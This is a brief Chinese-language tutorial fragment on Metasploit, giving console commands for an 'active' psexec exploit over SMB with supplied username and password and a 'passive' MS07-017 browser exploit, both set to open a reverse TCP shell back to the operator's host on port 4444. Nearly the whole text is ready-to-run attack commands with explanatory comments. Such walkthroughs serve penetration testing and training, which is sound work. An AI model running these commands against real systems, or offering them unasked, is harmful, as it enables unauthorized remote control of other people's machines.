主动active exploits
use exploit/windows/smb/psexec #这个就是为连接windows的shell
set RHOST 192.168.1.100 #目标IP地址
set PAYLOAD windows/shell/reverse_tcp #在目标执行反弹shell
set LHOST 192.168.1.1 #反弹的目标地址
set LPORT 4444 #反弹端口
set SMBUSER user1 #用户名
set SMBPASS pass1 #密码
exploit
执行成功
然后进入会话就能连接到shell
被动passive exploit
use exploit/windows/browser/ms07_017_ani_loadimage_chunksize #加载模块
set URIPATH /
set PAYLOAD windows/shell/reverse_tcp
set LHOST 192.168.1.1
set LPORT 4444
exploit
没有这么老掉牙的系统,不演示了;